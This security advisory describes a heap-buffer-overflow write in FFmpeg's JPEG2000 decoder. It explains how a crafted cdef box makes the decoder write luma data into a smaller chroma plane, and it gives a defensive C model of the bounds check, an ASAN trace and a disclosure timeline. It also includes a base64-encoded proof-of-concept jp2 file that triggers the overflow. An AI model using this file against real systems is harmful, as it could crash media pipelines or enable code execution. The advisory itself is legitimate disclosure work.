**security-research**

# FFmpeg – Heap-buffer-overflow write in jpeg2000dec

## Package

## Affected versions

## Patched versions

## Description

### Summary

The vulnerability lies in the handling of the JPEG2000 Channel Definition (cdef) box, which defines the mapping of codestream components to colour channels. When a chroma-subsampled pixel format is used together with a cdef box, a corner case can be triggered. For example, for a YUV420P frame with a 64×32 resolution, the Y plane will be 64*32+16+63=2127 bytes, and the U and V planes will each be 64*32/2+16+63=1103 bytes. By choosing a cdef entry with cn=0 and asoc=2, the data of the full-resolution luma component Y (height 32) is written into the smaller subsampled chroma plane U (height 16), overflowing the frame buffer picture->data[plane] by 64*16=1024 bytes.
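To make the arithmetic in the summary concrete from the defender's side, the following is an added example (not code from FFmpeg or from this advisory) that models plane and component geometry for a planar YUV frame and performs the fit check a decoder needs before honouring a cdef mapping. The 64-byte stride alignment, the 16+63 padding constant, and the 1-based reading of asoc (asoc=2 selecting the U plane) are assumptions chosen to reproduce the sizes quoted above; STRIDE_ALIGN, plane_for, comp_for, cdef_mapping_fits, and overflow_bytes are hypothetical names.

```c
#include <stdbool.h>
#include <stdio.h>

/* Assumed stride alignment. FFmpeg's get_buffer applies its own alignment
 * rules; 64 reproduces the linesizes implied by the advisory's numbers. */
#define STRIDE_ALIGN 64

/* Buffer padding as used in the advisory's size formulas (w*h + 16 + 63). */
#define PLANE_PADDING (16 + 63)

/* Geometry of one allocated frame plane (what picture->data[plane] points at). */
typedef struct {
    int linesize; /* bytes per row, including alignment padding */
    int height;   /* rows actually allocated */
} plane_geom;

/* Sample grid of one codestream component, as declared in the SIZ marker. */
typedef struct {
    int width;
    int height;
} comp_geom;

static int align_up(int v, int a) { return (v + a - 1) / a * a; }

/* Plane geometry for an 8-bit planar YUV frame. log2_cw/log2_ch are the
 * chroma subsampling shifts (1/1 for yuv420p); plane 0 is luma. */
static plane_geom plane_for(int frame_w, int frame_h, int log2_cw, int log2_ch, int plane)
{
    plane_geom g;
    int w = plane == 0 ? frame_w : (frame_w + (1 << log2_cw) - 1) >> log2_cw;
    int h = plane == 0 ? frame_h : (frame_h + (1 << log2_ch) - 1) >> log2_ch;
    g.linesize = align_up(w, STRIDE_ALIGN);
    g.height   = h;
    return g;
}

/* Component geometry from the SIZ subsampling factors XRsiz/YRsiz. */
static comp_geom comp_for(int frame_w, int frame_h, int xrsiz, int yrsiz)
{
    comp_geom c = { (frame_w + xrsiz - 1) / xrsiz, (frame_h + yrsiz - 1) / yrsiz };
    return c;
}

/* Total bytes a plane occupies under the advisory's formula. */
static long plane_alloc_size(plane_geom p)
{
    return (long)p.linesize * p.height + PLANE_PADDING;
}

/* The check a decoder must make before honouring a cdef entry: the component
 * mapped onto a plane must fit that plane's row length and row count. */
static bool cdef_mapping_fits(comp_geom c, plane_geom p)
{
    return c.width <= p.linesize && c.height <= p.height;
}

/* Bytes that a row-by-row copy of c into p would write past the allocation.
 * Every row beyond p.height lands after the end of the buffer. */
static long overflow_bytes(comp_geom c, plane_geom p)
{
    long excess_rows = c.height > p.height ? c.height - p.height : 0;
    return excess_rows * p.linesize;
}

/* The advisory's scenario: 64x32 yuv420p, cdef cn=0 (luma) with asoc=2.
 * asoc is read as 1-based here, so asoc=2 selects plane index 1 (U). */
static long advisory_overflow(void)
{
    comp_geom  y = comp_for(64, 32, 1, 1);         /* 64x32 luma component */
    plane_geom u = plane_for(64, 32, 1, 1, 2 - 1); /* linesize 64, 16 rows */
    return overflow_bytes(y, u);                   /* 1024 */
}

int main(void)
{
    plane_geom y_plane = plane_for(64, 32, 1, 1, 0);
    plane_geom u_plane = plane_for(64, 32, 1, 1, 1);
    comp_geom  y_comp  = comp_for(64, 32, 1, 1);

    printf("Y plane: %ld bytes, U plane: %ld bytes\n",
           plane_alloc_size(y_plane), plane_alloc_size(u_plane));
    printf("cn=0 -> asoc=2 fits: %s, overflow: %ld bytes\n",
           cdef_mapping_fits(y_comp, u_plane) ? "yes" : "no", advisory_overflow());
    return 0;
}
```

Run as-is it reports the 2127/1103-byte planes from the summary and a 1024-byte overflow for the cn=0/asoc=2 mapping, matching the "0 bytes after 1103-byte region" in the ASAN report below. A hardened decoder rejects the file at the point where cdef_mapping_fits returns false, before any sample is written; the same check passes for the identity mapping and for a genuinely subsampled component (XRsiz=YRsiz=2) mapped onto a chroma plane.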

### Severity

High – Allows an attacker to potentially gain remote code execution or cause denial of service.

### Proof of Concept

The following base64 encoded `poc.jp2` triggers the ASAN panic below:

```
AAAADGpQICANCocKAAAAFGZ0eXBqcDIgAAAAAGpwMiAAAABJanAyaAAAABZpaGRyAAAAIAAAAEAA AwgHAAAAAAAPY29scgEAAAAAABIAAAAcY2RlZgADAAAAAAACAAEAAAACAAIAAAACAAAAympwMmP/ T/9RAC8AAAAAAEAAAAAgAAAAAAAAAAAQAAAAEAAAAAAAAAAAAAAAAAMHAQEHAgIHAgL/UgAMAAAA AQAGAgIAAf9cABYgQEhIUEhIUEhIUEhIUEhIUEhIUP+QAAoAAAAAAGcAAf+T32gQCYf/AAgH/wAI BwAAAKHzggABuwAAp9oMC0FzRGLwAACj6gkACchYhMatzBLXAACh848AZRCkKnPzhveC/MUI/qlg AACx+oF/UCiMWOlqioxY6WqKAAD/2Q==
```

ASAN panic:

```
==1929947==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x51a0000106cf at pc 0x5643c58b5858 bp 0x7fe552bfe410 sp 0x7fe552bfe408
WRITE of size 1 at 0x51a0000106cf thread T1 (av:jpeg200:df0)
    #0 0x5643c58b5857 in write_frame_8 libavcodec/jpeg2000dec.c:2368:1
    #1 0x5643c58b5857 in jpeg2000_decode_tile libavcodec/jpeg2000dec.c:2389:9
    #2 0x5643c51560ad in avcodec_default_execute2 libavcodec/avcodec.c:92:17
    #3 0x5643c58ae7d7 in jpeg2000_decode_frame libavcodec/jpeg2000dec.c:2903:5
    #4 0x5643c53b03f4 in decode_simple_internal libavcodec/decode.c:439:16
    #5 0x5643c53b03f4 in decode_simple_receive_frame libavcodec/decode.c:597:15
    #6 0x5643c53b03f4 in ff_decode_receive_frame_internal libavcodec/decode.c:633:15
    #7 0x5643c5ca20dc in frame_worker_thread libavcodec/pthread_frame.c:295:19
    #8 0x5643c424855a in asan_thread_start(void*) asan_interceptors.cpp.o
    #9 0x7fe555a33b7a in start_thread nptl/pthread_create.c:448:8
    #10 0x7fe555ab17b7 in __GI___clone3 misc/../sysdeps/unix/sysv/linux/x86_64/clone3.S:78

0x51a0000106cf is located 0 bytes after 1103-byte region [0x51a000010280,0x51a0000106cf)
allocated by thread T1 (av:jpeg200:df0) here:
    #0 0x5643c424b70b in posix_memalign
    #1 0x5643c774c426 in av_malloc libavutil/mem.c:107:9
    #2 0x5643c7702fd7 in av_buffer_alloc libavutil/buffer.c:82:12
    #3 0x5643c7702fd7 in av_buffer_allocz libavutil/buffer.c:95:24
    #4 0x5643c7705007 in pool_alloc_buffer libavutil/buffer.c:369:26
    #5 0x5643c7705007 in av_buffer_pool_get libavutil/buffer.c:407:15
    #6 0x5643c5650349 in video_get_buffer libavcodec/get_buffer.c:233:23
    #7 0x5643c5650349 in avcodec_default_get_buffer2 libavcodec/get_buffer.c:285:16
    #8 0x5643c53b76d4 in ff_get_buffer libavcodec/decode.c:1683:11
    #9 0x5643c5ca1781 in thread_get_buffer_internal libavcodec/pthread_frame.c:1041:11
    #10 0x5643c5ca1781 in ff_thread_get_buffer libavcodec/pthread_frame.c:1050:15
    #11 0x5643c58aceed in jpeg2000_decode_frame libavcodec/jpeg2000dec.c:2882:16
    #12 0x5643c53b03f4 in decode_simple_internal libavcodec/decode.c:439:16
    #13 0x5643c53b03f4 in decode_simple_receive_frame libavcodec/decode.c:597:15
    #14 0x5643c53b03f4 in ff_decode_receive_frame_internal libavcodec/decode.c:633:15
    #15 0x5643c5ca20dc in frame_worker_thread libavcodec/pthread_frame.c:295:19
    #16 0x5643c424855a in asan_thread_start(void*) asan_interceptors.cpp.o

Thread T1 (av:jpeg200:df0) created by T0 here:
    #0 0x5643c4230115 in pthread_create
    #1 0x5643c40df235 in init_thread libavcodec/pthread_frame.c:912:11
    #2 0x5643c40deaa8 in ff_frame_thread_init libavcodec/pthread_frame.c:971:15
    #3 0x5643c5156d2f in avcodec_open2 libavcodec/avcodec.c:328:15
    #4 0x5643c428e011 in dec_open fftools/ffmpeg_dec.c:1601:16
    #5 0x5643c428ced0 in dec_init fftools/ffmpeg_dec.c:1666:11
    #6 0x5643c4296c28 in ist_use fftools/ffmpeg_demux.c:993:15
    #7 0x5643c429720b in ist_filter_add fftools/ffmpeg_demux.c:1029:11
    #8 0x5643c42b0b10 in ifilter_bind_ist fftools/ffmpeg_filter.c:685:11
    #9 0x5643c42b06b4 in fg_create_simple fftools/ffmpeg_filter.c:1234:11
    #10 0x5643c42d704e in ost_bind_filter fftools/ffmpeg_mux_init.c:1000:15
    #11 0x5643c42d1a99 in ost_add fftools/ffmpeg_mux_init.c:1536:15
    #12 0x5643c42cf1e5 in map_auto_video fftools/ffmpeg_mux_init.c:1640:16
    #13 0x5643c42c5b37 in create_streams fftools/ffmpeg_mux_init.c:1969:19
    #14 0x5643c42c5b37 in of_open fftools/ffmpeg_mux_init.c:3335:11
    #15 0x5643c42db146 in open_files fftools/ffmpeg_opt.c:1367:15
    #16 0x5643c42db146 in ffmpeg_parse_options fftools/ffmpeg_opt.c:1423:11
    #17 0x5643c431c06f in main fftools/ffmpeg.c:991:11
    #18 0x7fe5559caca7 in __libc_start_call_main csu/../sysdeps/nptl/libc_start_call_main.h:58:16
```

### Timeline

**Date reported**: 08/04/2025

**Date fixed**: 08/06/2025

**Date disclosed**: 09/08/2025